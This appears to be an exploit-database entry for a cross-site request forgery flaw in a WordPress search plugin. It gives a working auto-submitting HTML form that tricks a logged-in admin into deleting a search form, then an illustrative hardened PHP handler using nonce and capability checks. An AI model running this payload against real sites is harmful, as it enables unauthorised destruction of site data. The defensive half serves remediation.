## https://sploitus.com/exploit?id=WPEX-ID:5B84145B-F94E-4EA7-84D5-56CF776817A2
Make a logged-in admin open the following HTML (replace `__FORM_ID__` with a valid ID):
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin-ajax.php" method="post">
<input type="hidden" name="action" value="WPAS_Advanced_Search_extra_ajax">
<input type="hidden" name="ajax_type" value="delete_search">
<input type="hidden" name="security" value="123">
<input type="hidden" name="form_id" value="__FORM_ID__">
<input type="hidden" name="search_form_name" value="">
<input type="submit" value="Submit Request">
</form>
</body>
```
The `security` field isn't validated, so the forged request is accepted and the shortcode is deleted.
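
What a handler for this action looks like once the `security` field is actually checked, as an added example that is not the plugin's own code. The nonce action name, the option name, the storage layout, the numeric `form_id` and the `manage_options` capability are assumptions made for illustration; only the AJAX action and field names come from the request above.

```php
<?php
/**
 * Plugin Name: WPAS example hardened AJAX handler (added example)
 */

// Assumptions: nonce action name, option name and storage layout are illustrative.
const WPAS_EXAMPLE_NONCE  = 'wpas_example_manage_forms';
const WPAS_EXAMPLE_OPTION = 'wpas_example_forms';

// wp_ajax_* hooks only fire for logged-in users. That alone does not stop CSRF,
// because the admin's browser attaches the session cookie to the forged POST.
add_action( 'wp_ajax_WPAS_Advanced_Search_extra_ajax', 'wpas_example_extra_ajax' );

function wpas_example_extra_ajax() {
    // 1. Verify the nonce carried in the `security` field. A static value such
    //    as "123" fails here. $stop = false lets us choose the error response.
    if ( ! check_ajax_referer( WPAS_EXAMPLE_NONCE, 'security', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid or missing nonce.' ), 403 );
    }

    // 2. A nonce proves intent, not privilege: check the capability as well.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // 3. Validate the remaining fields (assumes form IDs are positive integers).
    $ajax_type = isset( $_POST['ajax_type'] ) ? sanitize_key( wp_unslash( $_POST['ajax_type'] ) ) : '';
    $form_id   = isset( $_POST['form_id'] ) ? absint( $_POST['form_id'] ) : 0;
    if ( 'delete_search' !== $ajax_type || 0 === $form_id ) {
        wp_send_json_error( array( 'message' => 'Bad request.' ), 400 );
    }

    // 4. Delete only a form that exists (assumed storage: one option, keyed by ID).
    $forms = get_option( WPAS_EXAMPLE_OPTION, array() );
    if ( ! isset( $forms[ $form_id ] ) ) {
        wp_send_json_error( array( 'message' => 'Unknown form.' ), 404 );
    }
    unset( $forms[ $form_id ] );
    update_option( WPAS_EXAMPLE_OPTION, $forms );

    wp_send_json_success( array( 'deleted' => $form_id ) );
}

// The admin screen that renders the delete control must place
// wp_create_nonce( WPAS_EXAMPLE_NONCE ) in its hidden `security` field.
```

With this check in place, the auto-submitting form above receives a 403 because a cross-site page cannot read the per-user nonce from the admin screen.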